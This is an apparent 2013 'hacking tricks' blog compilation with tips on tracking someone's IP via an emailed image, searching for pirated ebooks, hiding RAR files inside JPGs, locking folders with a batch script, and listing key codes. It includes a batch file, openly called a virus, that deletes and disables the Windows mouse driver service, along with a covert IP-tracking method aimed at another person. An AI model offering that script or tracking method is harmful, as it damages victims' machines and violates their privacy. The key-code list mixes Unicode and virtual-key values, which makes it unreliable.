Tuesday 24 September 2013

simple Trick to find IP

just need to send and image and follow below simple steps to find IP :

step 1 : open this link www.spypig.com 

step 2:  here you have to  enter your E-Mail ID and message title and create image to track IP..

step 3: Copy the image which you have select.

step 4: here you will have 60 seconds.

step 5: Paste and send to  X ( whose IP you need ).

step 6: When "X" opens it, you will get their IP.


yours
1289solutions....

Any E-Book free download

Search any e book and download for free .

step 1 : open google search engine

step 2 : type below code and search it.
                          "allinurl:+(rar|chm|zip|pdf|tgz) ebook name"

step 3 : now you will get a download option .

keep enjoying........

Saturday 7 September 2013

Hide Files Behind The Images

Learn To Hide Files Behind The Images

hide files behind images

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.
cd desktop
hide files behind images

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.jpg
hide files behind images
  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

    1. Open winrar
    2. Now locate your imag
- See more at: http://www.coolhackingtrick.com/2013/03/learn-to-hide-files-behind-images.html#sthash.E9V96QJr.dpuf

create virus to disable Mouse

creating a batch virus which is harmfull, it will disable your mouse - so think before trying it on yourself.

1) Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2) Save this file as  virus.bat
3) Done you just created your virus.

- See more at: http://www.coolhackingtrick.com/2012/01/make-virus-that-disable-mouse.html#sthash.aawBMEnA.dpuf

folder lock without any software

by using a simple batch file programming, a trick with password to protect a folder without using any software (this trick will work on all windows platform (Win XP, Win 7)) .

Learn this trick below steps -

1) Open Notepad and Copy code given below into it.
  

cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder 
:CONFIRM 
echo Are you sure to lock this folder? (Y/N) 
set/p "cho=>" 
if %cho%==Y goto LOCK 
if %cho%==y goto LOCK 
if %cho%==n goto END 
if %cho%==N goto END 
echo Invalid choice. 
goto CONFIRM 
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked 
goto End 
:UNLOCK 
echo Enter password to Unlock Your Secure Folder 
set/p "pass=>" 
if NOT %pass%== coolhacks goto FAIL 
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder echo Folder Unlocked successfully 
goto End 
:FAIL 
echo Invalid password 
goto end 
:MDMyFolder 
md MyFolder 
echo MyFolder created successfully 
goto End 
:End 


2. Save the notepad file as lock.bat (.bat is must)
3. Now double click on lock.bat and a new folder will be created with name MyFolder
4. Copy all your data you want to protect in that New folder
5. Now double click on lock.bat and when command promp appears Type Y and press enter.
6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
7. It will ask for password enter your password and done. (Default password is coolhacks)
To change the password replace coolhacks with  new password in the above code


How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

- See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.JLJ09Q34.dpuf

keyboard character codes

The below lists the Unicode character code value of the primary keys on your keyboard :

"0" is 48


  • a
    97
  • A
    65
  • b
    98
  • B
    66
  • c
    99
  • C
    67
  • d
    100
  • D
    68
  • e
    101
  • E
    69
  • f
    102
  • F
    70
  • g
    103
  • G
    71
  • h
    104
  • H
    72
  • i
    105
  • I
    73
  • j
    106
  • J
    74
  • k
    107
  • K
    75
  • l
    108
  • L
    76
  • m
    109
  • M
    77
  • n
    110
  • N
    78
  • o
    111
  • O
    79
  • p
    112
  • P
    80
  • q
    113
  • Q
    81
  • r
    114
  • R
    82
  • s
    115
  • S
    83
  • t
    116
  • T
    84
  • u
    117
  • U
    85
  • v
    118
  • V
    86
  • w
    119
  • W
    87
  • x
    120
  • X
    88
  • y
    121
  • Y
    89
  • z
    122
  • Z
    90


  • 0
    48
  • 1
    49
  • 2
    50
  • 3
    51
  • 4
    52
  • 5
    53
  • 6
    54
  • 7
    55
  • 8
    56
  • 9
    57
  • F1
    112
  • F2
    113
  • F3
    114
  • F4
    115
  • F5
    116
  • F6
    117
  • F7
    118
  • F8
    119
  • F9
    120
  • F10
    121
  • F11
    122
  • F12
    123
  • Space
    32
  • BackSpace
    8
  • Enter
    13
  • Shift
    16
  • Ctrl
    17
  • Alt
    18